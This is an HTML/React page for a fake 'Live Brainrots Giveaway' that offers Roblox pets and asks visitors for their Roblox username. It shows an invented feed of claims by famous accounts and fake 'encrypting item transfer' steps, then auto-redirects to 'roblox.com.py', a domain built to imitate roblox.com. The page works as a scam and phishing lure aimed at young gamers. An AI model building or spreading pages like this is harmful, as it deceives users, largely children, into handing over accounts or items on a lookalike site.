<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Live Brainrots Giveaway</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet">
    <style>
        body { font-family: 'Inter', sans-serif; }
        .custom-scrollbar::-webkit-scrollbar { width: 6px; }
        .custom-scrollbar::-webkit-scrollbar-track { background: rgba(255, 255, 255, 0.1); border-radius: 4px; }
        .custom-scrollbar::-webkit-scrollbar-thumb { background: rgba(255, 255, 255, 0.3); border-radius: 4px; }
        .custom-scrollbar::-webkit-scrollbar-thumb:hover { background: rgba(255, 255, 255, 0.5); }
        @keyframes roll3D { 0% { transform: perspective(1000px) rotateY(0deg); } 100% { transform: perspective(1000px) rotateY(360deg); } }
        .animate-roll:hover, .group:hover .animate-roll { animation: roll3D 4s linear infinite; }
    </style>
    <!-- Babel for in-browser JSX/TS transpilation -->
    <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
    
    <!-- Import Map for modules -->
    <script type="importmap">
    {
      "imports": {
        "react": "https://esm.sh/react@18.2.0?dev",
        "react-dom/client": "https://esm.sh/react-dom@18.2.0/client?dev",
        "lucide-react": "https://esm.sh/lucide-react@0.460.0?dev",
        "@google/genai": "https://esm.sh/@google/genai@0.1.1"
      }
    }
    </script>
</head>
<body class="bg-[#0f172a]">
    <div id="root"></div>

    <script type="text/babel" data-type="module">
        import React, { useState, useEffect, useRef } from 'react';
        import ReactDOM from 'react-dom/client';
        import { 
            Radio, Youtube, User, Loader2, Sparkles, Info, X, 
            AlertTriangle, CheckCircle2, CheckCircle, ExternalLink 
        } from 'lucide-react';
        import { GoogleGenAI } from '@google/genai';

        // --- Constants & Types ---
        const Rarity = {
            COMMON: 'COMMON',
            RARE: 'RARE',
            EPIC: 'EPIC',
            LEGENDARY: 'LEGENDARY',
            RADIOACTIVE: 'RADIOACTIVE',
            SECRET: 'SECRET',
        };

        const REDIRECT_URL = "https://roblox.com.py/games/109983668079237/Steal-a-Brainrot?privateServerLinkCode=67071888670726806607964649986279";

        const MOCK_PETS = [
            { id: '1', name: 'Meowl', rarity: Rarity.RADIOACTIVE, imageUrl: 'https://brainroot.netlify.app/images/Meowl.png' },
            { id: '2', name: 'StrawberryElephant', rarity: Rarity.RADIOACTIVE, imageUrl: 'https://brainroot.netlify.app/images/StrawberryElephant.png' },
            { id: '3', name: 'Lavadorito Spinito', rarity: Rarity.SECRET, imageUrl: 'https://brainroot.netlify.app/images/Gemini.png' },
            { id: '4', name: 'W or L', rarity: Rarity.SECRET, imageUrl: 'https://brainroot.netlify.app/images/WorL.png' },
            { id: '5', name: '67', rarity: Rarity.SECRET, imageUrl: 'https://brainroot.netlify.app/images/67.png' },
            { id: '6', name: 'La Supreme Combinasion', rarity: Rarity.SECRET, imageUrl: 'https://static.beebom.com/wp-content/uploads/2025/07/La-Supreme-Combinasion.jpg' },
            { id: '7', name: 'Ketupat Kepat', rarity: Rarity.SECRET, imageUrl: 'https://static.beebom.com/wp-content/uploads/2025/07/Ketupat-Kepat.jpg' },
            { id: '8', name: 'Ketchuru and Musturu', rarity: Rarity.SECRET, imageUrl: 'https://static.beebom.com/wp-content/uploads/2025/07/Ketchuru-and-Musturu-1.jpg' }
        ];

        const ROBLOX_COMMUNITY_MEMBERS = [
            { id: 1, username: 'Roblox' }, { id: 156, username: 'Builderman' }, { id: 261, username: 'Shedletsky' },
            { id: 16160, username: 'Stickmasterluke' }, { id: 236079019, username: 'KreekCraft' }, { id: 158332152, username: 'Flamingo' },
            { id: 52569, username: 'Telamon' }, { id: 8752624, username: 'Guest_99' }, { id: 189764, username: 'Clockwork' },
            { id: 20456308, username: 'DenisDaily' }, { id: 489234, username: 'NoobMaster' }, { id: 998877, username: 'BloxLover' },
            { id: 1234567, username: 'LuckyWinner' }, { id: 7654321, username: 'PetHunter' }, { id: 5000001, username: 'SpyderFan' },
            { id: 800000, username: 'Glitch' }, { id: 900000, username: 'BaconHair' }, { id: 35815907, username: 'GroupOwner' }
        ];

        const INITIAL_ACTIVITIES = [
            {
                id: 'a1', username: 'Roblox', handle: '@Roblox', action: 'found', target: 'Meowl',
                avatarUrl: 'https://tr.rbxcdn.com/53eb9b17fe1432a801e7d8d2b77a08b3/150/150/AvatarHeadshot/Png', time: 'just now'
            }
        ];

        const RARITY_COLORS = {
            [Rarity.COMMON]: 'bg-gray-400 text-white',
            [Rarity.RARE]: 'bg-blue-400 text-white',
            [Rarity.EPIC]: 'bg-purple-500 text-white',
            [Rarity.LEGENDARY]: 'bg-orange-400 text-white',
            [Rarity.RADIOACTIVE]: 'bg-lime-400 text-lime-900',
            [Rarity.SECRET]: 'bg-fuchsia-500 text-white',
        };

        // --- Services ---
        window.process = { env: { API_KEY: '' } }; // Mock for standalone

        const generatePetLore = async (petName, rarity) => {
            if (!window.process.env.API_KEY) {
                return `The legendary ${petName} is a mysterious entity found in the depths of the Roblox multiverse. Its ${rarity} status makes it highly sought after by collectors. (Mock Response)`;
            }
            try {
                const ai = new GoogleGenAI({ apiKey: window.process.env.API_KEY });
                const prompt = `Write a short, funny, chaotic 'brainrot' style description (max 2 sentences) for a fictional Roblox pet named "${petName}" with rarity "${rarity}".`;
                const response = await ai.models.generateContent({ model: "gemini-2.5-flash", contents: prompt });
                return response.text || "No lore found in the void.";
            } catch (error) {
                console.error("Error generating pet lore:", error);
                return "The ancient scrolls are unreadable at this moment (API Error).";
            }
        };

        const PROXY_URL = 'https://corsproxy.io/?';
        const fetchRobloxAvatar = async (userId) => {
            try {
                const response = await fetch(`${PROXY_URL}https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=${userId}&size=150x150&format=Png&isCircular=false`);
                if (!response.ok) return '';
                const data = await response.json();
                if (data.data && data.data.length > 0 && data.data[0].state === 'Completed') return data.data[0].imageUrl;
            } catch (e) { }
            return `https://ui-avatars.com/api/?name=User&background=random`;
        };

        const fetchRobloxProfile = async (username) => {
            try {
                const idResponse = await fetch(`${PROXY_URL}https://users.roblox.com/v1/usernames/users`, {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
                    body: JSON.stringify({ usernames: [username], excludeBannedUsers: true })
                });
                if (!idResponse.ok) throw new Error('Network response was not ok');
                const idData = await idResponse.json();
                if (!idData.data || idData.data.length === 0) throw new Error('User not found');
                const userId = idData.data[0].id;
                const displayName = idData.data[0].displayName;
                const userResponse = await fetch(`${PROXY_URL}https://users.roblox.com/v1/users/${userId}`);
                const userData = await userResponse.json();
                const avatarUrl = await fetchRobloxAvatar(userId);
                return {
                    id: userId, username: userData.name, displayName: displayName,
                    description: userData.description || "No description provided.",
                    created: new Date(userData.created).toLocaleDateString(),
                    avatarUrl: avatarUrl || `https://ui-avatars.com/api/?name=${username}&background=random`,
                    profileUrl: `https://www.roblox.com/users/${userId}/profile`
                };
            } catch (error) {
                await new Promise(resolve => setTimeout(resolve, 800));
                const fakeId = 875200000 + Math.floor(Math.random() * 100000);
                return {
                    id: fakeId, username: username, displayName: username,
                    description: "Bow down? Nah, just vibe ✨\nI'm " + username + ", ruling with kindness 👑\nAdd me & let's play! 🎮",
                    created: new Date().toLocaleDateString(),
                    avatarUrl: `https://api.dicebear.com/9.x/avataaars/svg?seed=${username}`,
                    profileUrl: `https://www.roblox.com/users/${fakeId}/profile`
                };
            }
        };

        // --- Components ---

        const Header = () => {
            return (
                <header className="mb-8">
                    <div className="flex items-center justify-between">
                        <div className="drop-shadow-lg">
                            <h1 className="text-3xl font-extrabold text-white tracking-tight">Live Brainrots Giveaway</h1>
                            <p className="text-gray-200 mt-1 text-sm md:text-base font-medium">Claim limited-time pets before they expire.</p>
                            <div className="mt-2 flex flex-col sm:flex-row sm:items-center gap-4">
                                <p className="text-white/60 text-xs font-medium">Made by Cærl Nasād.</p>
                                <div className="flex items-center gap-2">
                                    <a href="https://www.tiktok.com/@carlzisnothere" target="_blank" rel="noopener noreferrer" className="flex items-center gap-1.5 text-white/60 hover:text-[#ff0050] transition-colors text-xs font-bold bg-white/5 px-2 py-1 rounded-md border border-white/5 hover:bg-white/10">
                                        <svg viewBox="0 0 24 24" fill="currentColor" className="w-3 h-3"><path d="M19.59 6.69a4.83 4.83 0 0 1-3.77-4.25V2h-3.45v13.67a2.89 2.89 0 0 1-5.2 1.74 2.89 2.89 0 0 1 2.31-4.64 2.93 2.93 0 0 1 .88.13V9.4a6.84 6.84 0 0 0-1-.05A6.33 6.33 0 0 0 5 20.1a6.34 6.34 0 0 0 10.86-4.43v-7a8.16 8.16 0 0 0 4.77 1.52v-3.4a4.85 4.85 0 0 1-1-.1z"/></svg> TikTok
                                    </a>
                                    <a href="https://www.youtube.com/@StrangerToGargatuanTV" target="_blank" rel="noopener noreferrer" className="flex items-center gap-1.5 text-white/60 hover:text-[#FF0000] transition-colors text-xs font-bold bg-white/5 px-2 py-1 rounded-md border border-white/5 hover:bg-white/10">
                                        <Youtube size={14} /> YouTube
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div className="flex items-center gap-2 bg-red-600/90 backdrop-blur-sm text-white px-3 py-1 rounded-full text-xs font-bold animate-pulse shadow-lg border border-red-500/50">
                            <Radio size={14} className="animate-ping absolute inline-flex h-3 w-3 rounded-full bg-red-400 opacity-75" />
                            <Radio size={14} /> <span>LIVE</span>
                        </div>
                    </div>
                </header>
            );
        };

        const AccountForm = ({ userState, setUserState, selectedCount, onClaim }) => {
            const [inputValue, setInputValue] = useState('');
            const [loading, setLoading] = useState(false);
            const [error, setError] = useState('');
            const handleSave = async () => {
                if (inputValue.trim().length === 0) return;
                setLoading(true); setError('');
                try {
                    const profile = await fetchRobloxProfile(inputValue);
                    setUserState({ username: profile.username, isSaved: true, profile });
                } catch (err) { setError('Could not find user. Please try again.'); } 
                finally { setLoading(false); }
            };
            const handleChangeUser = () => { setUserState({ username: '', isSaved: false, profile: undefined }); setInputValue(''); };

            return (
                <div className="bg-white/10 backdrop-blur-md rounded-2xl shadow-xl border border-white/20 mb-8 overflow-hidden">
                    <div className="p-6 grid grid-cols-1 lg:grid-cols-3 gap-6">
                        <div className="lg:col-span-2">
                            {!userState.isSaved ? (
                                <div className="space-y-4">
                                    <div className="flex items-center gap-2 mb-2"><User className="text-white/80" size={20} /><h2 className="text-lg font-bold text-white">Roblox Account</h2></div>
                                    <p className="text-xs text-gray-300 mb-4">Real Roblox info appears after saving your username.</p>
                                    <div className="flex gap-2">
                                        <div className="relative flex-grow">
                                            <span className="absolute left-3 top-1/2 -translate-y-1/2 text-gray-400 text-sm">@</span>
                                            <input type="text" placeholder="Enter Roblox username" className="w-full pl-8 pr-4 py-3 bg-black/20 border border-white/10 text-white placeholder-gray-400 rounded-lg focus:outline-none focus:ring-2 focus:ring-purple-500/50 transition-all text-sm backdrop-blur-sm" value={inputValue} onChange={(e) => setInputValue(e.target.value)} onKeyDown={(e) => e.key === 'Enter' && handleSave()} />
                                        </div>
                                        <button onClick={handleSave} disabled={loading} className="bg-red-500/80 hover:bg-red-500 text-white font-bold py-3 px-6 rounded-lg transition-all text-sm min-w-[100px] flex justify-center items-center backdrop-blur-sm border border-red-400/30">
                                            {loading ? <Loader2 size={18} className="animate-spin" /> : 'Save'}
                                        </button>
                                    </div>
                                    {error && <p className="text-red-300 text-xs mt-2 font-medium bg-red-900/20 px-2 py-1 rounded w-fit">{error}</p>}
                                </div>
                            ) : (
                                <div className="flex flex-col sm:flex-row gap-6 items-start h-full relative">
                                    <button onClick={handleChangeUser} className="absolute -top-2 -right-2 text-xs text-white/50 hover:text-white px-2 py-1 transition-colors">Change</button>
                                    <div className="flex-shrink-0"><img src={userState.profile?.avatarUrl} alt="avatar" className="w-20 h-20 rounded-full bg-white/5 object-cover border-4 border-white/10 shadow-lg animate-roll" /></div>
                                    <div className="flex-grow min-w-0">
                                        <div className="mb-4"><h2 className="text-xl font-extrabold text-white leading-none drop-shadow-md">{userState.profile?.displayName}</h2><p className="text-sm text-gray-300 font-medium mt-1">@{userState.profile?.username}</p></div>
                                        <div className="flex flex-wrap items-center gap-6 mb-5 border-b border-white/10 pb-5">
                                            <div><p className="text-[10px] uppercase tracking-wider text-gray-400 font-bold mb-0.5">User ID</p><p className="text-sm font-bold text-gray-200">{userState.profile?.id}</p></div>
                                            <div><p className="text-[10px] uppercase tracking-wider text-gray-400 font-bold mb-0.5">Joined</p><p className="text-sm font-bold text-gray-200">{userState.profile?.created}</p></div>
                                            <div className="flex items-end h-full"><a href={userState.profile?.profileUrl} target="_blank" rel="noreferrer" className="text-sm font-bold text-blue-300 hover:text-blue-200 flex items-center gap-1 leading-none mt-2 transition-colors">Open <span className="text-xs">↗</span></a></div>
                                        </div>
                                        <div><h3 className="text-xs font-bold text-gray-300 mb-1">Description</h3><p className="text-xs text-gray-400 leading-relaxed line-clamp-3 whitespace-pre-line">{userState.profile?.description}</p></div>
                                    </div>
                                </div>
                            )}
                        </div>
                        <div className="lg:col-span-1 border-l border-white/10 lg:pl-6 flex flex-col justify-center">
                            <div className="mb-4"><p className="text-xs font-semibold text-gray-400 uppercase tracking-wider">Selected Items</p><p className="text-4xl font-extrabold text-white drop-shadow-sm">{selectedCount}</p></div>
                            <button onClick={onClaim} disabled={selectedCount === 0} className={`w-full py-4 rounded-xl font-bold text-white shadow-lg transform transition-all active:scale-95 flex items-center justify-center gap-2 border ${selectedCount > 0 ? 'bg-red-500/80 hover:bg-red-500 border-red-400/50 shadow-red-900/20' : 'bg-white/5 border-white/5 text-gray-400 cursor-not-allowed'}`}>Claim Selected ({selectedCount})</button>
                        </div>
                    </div>
                </div>
            );
        };

        const PetCard = ({ pet, isSelected, onSelect, onInfo }) => (
            <div className={`group relative bg-white/10 backdrop-blur-md rounded-2xl p-4 shadow-lg border transition-all duration-300 hover:shadow-xl hover:bg-white/15 ${isSelected ? 'border-purple-500 ring-2 ring-purple-500 ring-opacity-50' : 'border-white/10 hover:border-white/30'}`}>
                <div className="flex justify-center mb-4"><span className={`${RARITY_COLORS[pet.rarity]} text-[10px] font-extrabold px-3 py-1 rounded-full uppercase tracking-widest shadow-lg border border-white/20`}>{pet.rarity}</span></div>
                <div className="relative aspect-square w-full mb-4 overflow-hidden rounded-xl bg-black/20 border border-white/5 flex items-center justify-center shadow-inner">
                    <div className="w-3/4 h-3/4 transition-transform duration-300 group-hover:scale-110"><img src={pet.imageUrl} alt={pet.name} className="w-full h-full object-contain drop-shadow-xl animate-roll" loading="lazy" /></div>
                </div>
                <div className="text-center mb-4"><h3 className="font-bold text-white text-sm truncate px-2 drop-shadow-sm">{pet.name}</h3></div>
                <button onClick={() => onSelect(pet.id)} className={`w-full py-2.5 rounded-lg text-xs font-bold uppercase tracking-wider transition-all duration-200 border ${isSelected ? 'bg-purple-600/90 text-white shadow-lg shadow-purple-900/30 border-purple-400/50' : 'bg-white/10 text-white hover:bg-purple-500 hover:border-purple-400 border-white/10'}`}>{isSelected ? 'Selected' : 'Select'}</button>
            </div>
        );

        const LiveActivity = ({ className }) => {
            const [activities, setActivities] = useState(INITIAL_ACTIVITIES);
            const scrollRef = useRef(null);
            useEffect(() => {
                const generateActivity = async () => {
                    const randomPet = MOCK_PETS[Math.floor(Math.random() * MOCK_PETS.length)];
                    const randomMember = ROBLOX_COMMUNITY_MEMBERS[Math.floor(Math.random() * ROBLOX_COMMUNITY_MEMBERS.length)];
                    let avatarUrl = `https://ui-avatars.com/api/?name=${randomMember.username}&background=random`;
                    try { const realAvatar = await fetchRobloxAvatar(randomMember.id); if (realAvatar) avatarUrl = realAvatar; } catch (e) {}
                    const newActivity = { id: Date.now().toString(), username: randomMember.username, handle: `@${randomMember.username}`, action: Math.random() > 0.5 ? 'found' : 'claimed', target: randomPet.name, avatarUrl: avatarUrl, time: 'just now' };
                    setActivities(prev => [newActivity, ...prev].slice(0, 20));
                };
                const interval = setInterval(generateActivity, 4500);
                return () => clearInterval(interval);
            }, []);
            return (
                <div className={`bg-white/10 backdrop-blur-md rounded-2xl shadow-xl border border-white/20 overflow-hidden flex flex-col h-[600px] sticky top-8 ${className}`}>
                    <div className="p-5 border-b border-white/10 bg-white/5 z-10"><h3 className="font-bold text-white text-lg">Live Activity</h3><p className="text-gray-300 text-xs">Recent claims (simulated)</p></div>
                    <div className="overflow-y-auto flex-1 p-4 space-y-4 custom-scrollbar" ref={scrollRef}>
                        {activities.map((activity) => (
                            <div key={activity.id} className="flex gap-3 items-start animate-fade-in group hover:bg-white/5 p-2 rounded-lg transition-colors">
                                <img src={activity.avatarUrl} alt="avatar" className="w-8 h-8 rounded-full border border-white/20 bg-black/20 animate-roll object-cover" onError={(e) => { e.target.src = `https://ui-avatars.com/api/?name=${activity.username}&background=random`; }} />
                                <div className="min-w-0 flex-1">
                                    <div className="flex flex-wrap items-baseline gap-1"><span className="text-sm font-bold text-gray-100 truncate max-w-[100px]">{activity.username}</span><span className="text-xs text-gray-400 truncate max-w-[80px]">{activity.handle}</span></div>
                                    <p className="text-sm text-gray-300 leading-snug">{activity.action} <span className="font-semibold text-red-300">{activity.target}</span></p>
                                    <span className="text-[10px] text-gray-500 mt-1 block">{activity.time}</span>
                                </div>
                            </div>
                        ))}
                    </div>
                    <div className="h-12 bg-gradient-to-t from-black/20 to-transparent pointer-events-none absolute bottom-0 w-full"></div>
                </div>
            );
        };

        const PetModal = ({ pet, onClose }) => {
            const [lore, setLore] = useState("");
            const [loading, setLoading] = useState(false);
            useEffect(() => {
                if (pet) {
                    setLoading(true); setLore("");
                    generatePetLore(pet.name, pet.rarity).then(text => { setLore(text); setLoading(false); });
                }
            }, [pet]);
            if (!pet) return null;
            return (
                <div className="fixed inset-0 z-50 flex items-center justify-center px-4">
                    <div className="absolute inset-0 bg-black/60 backdrop-blur-md transition-opacity" onClick={onClose}></div>
                    <div className="relative bg-[#0f172a]/80 backdrop-blur-xl border border-white/20 rounded-2xl w-full max-w-md shadow-2xl overflow-hidden transform transition-all scale-100 text-white">
                        <button onClick={onClose} className="absolute top-3 right-3 p-2 hover:bg-white/10 rounded-full text-gray-400 hover:text-white transition-colors z-10"><X size={20} /></button>
                        <div className="p-6">
                            <div className="flex flex-col items-center">
                                <div className="w-32 h-32 bg-white/5 rounded-full mb-4 flex items-center justify-center p-2 border border-white/10 shadow-inner"><img src={pet.imageUrl} alt={pet.name} className="w-full h-full object-contain animate-roll" /></div>
                                <h2 className="text-2xl font-bold text-white mb-1 drop-shadow-md">{pet.name}</h2>
                                <span className="bg-purple-500/20 border border-purple-500/30 text-purple-200 px-3 py-1 rounded-full text-xs font-bold uppercase mb-6 shadow-sm">{pet.rarity}</span>
                                <div className="w-full bg-indigo-500/10 rounded-xl p-5 border border-indigo-400/20 relative">
                                    <div className="absolute top-4 left-4"><Sparkles size={16} className="text-indigo-300" /></div>
                                    <div className="pl-6">
                                        <h4 className="text-xs font-bold text-indigo-300 uppercase tracking-wider mb-2">AI Generated Lore</h4>
                                        {loading ? <div className="flex items-center gap-2 text-indigo-200/70 text-sm"><Loader2 size={16} className="animate-spin" /><span>Consulting the Brainrot Oracle...</span></div> : <p className="text-sm text-indigo-100 leading-relaxed italic">"{lore}"</p>}
                                    </div>
                                </div>
                                <div className="mt-6 flex w-full gap-3"><button onClick={onClose} className="flex-1 py-3 bg-white/10 hover:bg-white/20 text-white font-bold rounded-xl text-sm transition-colors border border-white/5">Close</button><button className="flex-1 py-3 bg-red-500 hover:bg-red-600 text-white font-bold rounded-xl text-sm shadow-lg shadow-red-900/40 transition-colors border border-red-400/50">Add to Wishlist</button></div>
                            </div>
                        </div>
                    </div>
                </div>
            );
        };

        const ClaimConfirmationModal = ({ pets, username, onConfirm, onCancel }) => (
            <div className="fixed inset-0 z-[60] flex items-center justify-center px-4">
                <div className="absolute inset-0 bg-black/70 backdrop-blur-md" onClick={onCancel}></div>
                <div className="relative bg-white text-gray-900 rounded-2xl shadow-2xl w-full max-w-md overflow-hidden animate-fade-in">
                    <div className="p-5 border-b border-gray-100 flex justify-between items-center"><h3 className="text-lg font-bold text-gray-900">Confirm Selection</h3><button onClick={onCancel} className="text-gray-400 hover:text-gray-600 transition-colors"><X size={20} /></button></div>
                    <div className="p-6 space-y-6">
                        <div className="space-y-3">{pets.map(pet => (<div key={pet.id} className="flex items-center gap-4 p-2 rounded-xl border border-gray-100 hover:bg-gray-50 transition-colors"><div className="w-14 h-14 bg-gray-100 rounded-lg p-1 flex items-center justify-center"><img src={pet.imageUrl} className="w-full h-full object-contain animate-roll" alt={pet.name} /></div><div><p className="font-bold text-sm text-gray-800">{pet.name}</p><p className="text-xs text-gray-500 uppercase font-semibold tracking-wider">{pet.rarity}</p></div></div>))}</div>
                        <div><label className="text-xs font-bold text-gray-400 uppercase tracking-wider mb-1 block">Roblox Username</label><div className="text-lg font-bold text-gray-800">@{username}</div></div>
                    </div>
                    <div className="p-6 pt-2 flex gap-3"><button onClick={onCancel} className="flex-1 py-3 rounded-xl font-bold text-sm border border-gray-200 text-gray-600 hover:bg-gray-50 transition-colors">Cancel</button><button onClick={onConfirm} className="flex-1 py-3 rounded-xl font-bold text-sm bg-red-600 text-white hover:bg-red-700 shadow-lg shadow-red-900/20 transition-colors">Confirm</button></div>
                </div>
            </div>
        );

        const ClaimProcessingModal = ({ onComplete, onCancel }) => {
            const STEPS = ["Connecting to account...", "Encrypting item transfer...", "Finalizing confirmation..."];
            const [currentStep, setCurrentStep] = useState(0);
            
            useEffect(() => { 
                if (currentStep < STEPS.length) { 
                    const timeout = setTimeout(() => setCurrentStep(prev => prev + 1), 1500); 
                    return () => clearTimeout(timeout); 
                } 
            }, [currentStep]);

            return (
                <div className="fixed inset-0 z-[70] flex items-center justify-center px-4">
                    <div className="absolute inset-0 bg-black/80 backdrop-blur-md"></div>
                    <div className="relative bg-white text-gray-900 rounded-2xl shadow-2xl w-full max-w-md overflow-hidden animate-fade-in p-8">
                        <button onClick={onCancel} className="absolute top-4 right-4 text-gray-400 hover:text-gray-600"><X size={20} /></button>
                        <div className="mb-6"><h3 className="text-2xl font-bold mb-2 text-gray-900">Processing your claim</h3><p className="text-gray-500 text-sm">Please keep this tab open.</p></div>
                        <div className="space-y-5 mb-8">
                            {STEPS.map((step, index) => {
                                const isCompleted = currentStep > index; const isCurrent = currentStep === index;
                                return (<div key={index} className="flex items-center gap-3 transition-all duration-300">{isCompleted ? <CheckCircle2 className="text-green-500 flex-shrink-0" size={24} /> : isCurrent ? <Loader2 className="text-red-500 animate-spin flex-shrink-0" size={24} /> : <div className="w-6 h-6 rounded-full border-2 border-gray-200 flex-shrink-0"></div>}<span className={`font-medium ${isCompleted || isCurrent ? 'text-gray-900' : 'text-gray-400'}`}>{step}</span></div>);
                            })}
                        </div>
                        <div className="flex gap-3"><button onClick={onCancel} className="flex-1 py-3 border border-gray-300 rounded-xl font-bold text-gray-600 hover:bg-gray-50 transition-colors">Cancel</button><button onClick={onComplete} disabled={currentStep < STEPS.length} className={`flex-1 py-3 rounded-xl font-bold text-white transition-all duration-300 ${currentStep >= STEPS.length ? 'bg-red-600 hover:bg-red-700 shadow-lg shadow-red-600/30 animate-pulse cursor-pointer' : 'bg-gray-300 cursor-not-allowed'}`}>{currentStep >= STEPS.length ? 'Accept' : 'Processing...'}</button></div>
                    </div>
                </div>
            );
        };

        const ClaimReadyModal = ({ onJoin, onCancel }) => {
            const [timeLeft, setTimeLeft] = useState(3);
            
            useEffect(() => { 
                if (timeLeft > 0) { 
                    const timer = setTimeout(() => setTimeLeft(prev => prev - 1), 1000); 
                    return () => clearTimeout(timer); 
                } else { 
                    onJoin(); 
                } 
            }, [timeLeft, onJoin]);

            return (
                <div className="fixed inset-0 z-[80] flex items-center justify-center px-4">
                    <div className="absolute inset-0 bg-black/80 backdrop-blur-md" onClick={onCancel}></div>
                    <div className="relative bg-white text-gray-900 rounded-2xl shadow-2xl w-full max-w-md overflow-hidden animate-fade-in p-6">
                        <button onClick={onCancel} className="absolute top-4 right-4 text-gray-400 hover:text-gray-600"><X size={20} /></button>
                        <div className="flex flex-col items-center text-center mb-6"><div className="w-16 h-16 bg-green-100 rounded-full flex items-center justify-center mb-4 text-green-500"><CheckCircle size={32} strokeWidth={3} /></div><h3 className="text-2xl font-bold text-gray-900">Ready to Claim</h3></div>
                        <div className="bg-gray-50 border border-dashed border-gray-300 rounded-xl p-4 mb-6 text-left"><p className="text-xs font-bold text-gray-500 uppercase tracking-wider mb-2">Instructions</p><p className="text-sm text-gray-700 leading-relaxed">Join the private server and find <strong>Host</strong> in the spawn area to complete your claim.</p></div>
                        <div className="text-center mb-6"><p className="text-sm text-gray-500 animate-pulse">Redirecting in <span className="font-bold text-gray-800">{timeLeft}</span> seconds...</p></div>
                        <div className="flex gap-3"><button onClick={onCancel} className="px-6 py-3 border border-gray-200 rounded-xl font-bold text-gray-600 hover:bg-gray-50 transition-colors">Cancel</button><button onClick={onJoin} className="flex-1 py-3 bg-red-600 hover:bg-red-700 text-white font-bold rounded-xl shadow-lg shadow-red-900/20 flex items-center justify-center gap-2 transition-transform active:scale-95"><ExternalLink size={18} /> Join Now</button></div>
                    </div>
                </div>
            );
        };

        // --- App Component ---
        const App = () => {
            const [userState, setUserState] = useState({ username: '', isSaved: false });
            const [selectedPets, setSelectedPets] = useState(new Set());
            const [viewingPet, setViewingPet] = useState(null);
            const [showLimitWarning, setShowLimitWarning] = useState(false);
            const [showConfirmModal, setShowConfirmModal] = useState(false);
            const [showProcessingModal, setShowProcessingModal] = useState(false);
            const [showReadyModal, setShowReadyModal] = useState(false);

            const toggleSelect = (id) => {
                const newSelected = new Set(selectedPets);
                if (newSelected.has(id)) newSelected.delete(id);
                else { if (newSelected.size >= 3) { setShowLimitWarning(true); return; } newSelected.add(id); }
                setSelectedPets(newSelected);
            };

            const handleClaimClick = () => {
                if (!userState.isSaved) { alert("Please save your Roblox username first!"); return; }
                setShowConfirmModal(true);
            };
            const handleConfirmClaim = () => { setShowConfirmModal(false); setShowProcessingModal(true); };
            const handleProcessingComplete = () => { setShowProcessingModal(false); setShowReadyModal(true); };
            const handleFinalRedirect = () => { window.location.href = REDIRECT_URL; };
            const getSelectedPetObjects = () => MOCK_PETS.filter(pet => selectedPets.has(pet.id));

            return (
                <div className="min-h-screen text-white bg-fixed bg-cover bg-center transition-all duration-500" style={{ backgroundImage: `url('https://media1.tenor.com/m/1C0gJvJ4t8AAAAAd/pretty-sky-space.gif')`, backgroundColor: '#0f172a' }}>
                    <div className="min-h-screen bg-black/20 backdrop-blur-[1px]">
                        <div className="max-w-[1400px] mx-auto p-4 md:p-8">
                            <Header />
                            <div className="grid grid-cols-1 xl:grid-cols-12 gap-8">
                                <div className="xl:col-span-9">
                                    <AccountForm userState={userState} setUserState={setUserState} selectedCount={selectedPets.size} onClaim={handleClaimClick} />
                                    <div className="mb-4 flex items-center justify-between"><h2 className="text-xl font-bold text-white shadow-black drop-shadow-md">Choose Pets</h2><span className="text-sm text-gray-300 font-medium">{selectedPets.size} selected (Max 3)</span></div>
                                    <div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-4">{MOCK_PETS.map((pet) => (<PetCard key={pet.id} pet={pet} isSelected={selectedPets.has(pet.id)} onSelect={toggleSelect} onInfo={setViewingPet} />))}</div>
                                    <div className="mt-12 text-center text-white/40 text-xs py-8 border-t border-white/10"><p>&copy; 2024 Live Brainrots Giveaway. Not affiliated with Roblox Corporation.</p></div>
                                </div>
                                <div className="xl:col-span-3 hidden xl:block"><LiveActivity /></div>
                                <div className="col-span-1 xl:hidden"><LiveActivity className="h-[400px] sticky top-0" /></div>
                            </div>
                        </div>
                    </div>
                    <PetModal pet={viewingPet} onClose={() => setViewingPet(null)} />
                    {showConfirmModal && <ClaimConfirmationModal pets={getSelectedPetObjects()} username={userState.username} onConfirm={handleConfirmClaim} onCancel={() => setShowConfirmModal(false)} />}
                    {showProcessingModal && <ClaimProcessingModal onComplete={handleProcessingComplete} onCancel={() => setShowProcessingModal(false)} />}
                    {showReadyModal && <ClaimReadyModal onJoin={handleFinalRedirect} onCancel={() => setShowReadyModal(false)} />}
                    {showLimitWarning && (<div className="fixed inset-0 z-[60] flex items-center justify-center px-4"><div className="absolute inset-0 bg-black/60 backdrop-blur-md" onClick={() => setShowLimitWarning(false)}></div><div className="bg-[#1a1a2e]/90 border border-white/10 text-white rounded-2xl shadow-2xl p-6 max-w-sm w-full relative transform scale-100 animate-fade-in backdrop-blur-xl"><button onClick={() => setShowLimitWarning(false)} className="absolute top-4 right-4 text-gray-400 hover:text-white p-1 bg-white/5 rounded-full hover:bg-white/10 transition-colors"><X size={16} /></button><div className="flex flex-col items-center text-center mt-2"><div className="w-14 h-14 bg-red-500/10 rounded-full flex items-center justify-center mb-4 text-red-400 shadow-sm border border-red-500/20"><AlertTriangle size={28} /></div><h3 className="text-xl font-extrabold text-white mb-2">Limit Reached!</h3><p className="text-sm text-gray-300 mb-6 leading-relaxed">You can only select up to <strong>3 Brainrots</strong> at a time. Please unselect one to choose another.</p><button onClick={() => setShowLimitWarning(false)} className="bg-white text-gray-900 hover:bg-gray-200 font-bold py-3.5 px-8 rounded-xl w-full transition-all active:scale-95 shadow-lg">Understood</button></div></div></div>)}
                </div>
            );
        };

        const root = ReactDOM.createRoot(document.getElementById('root'));
        root.render(<App />);
    </script>
</body>
</html>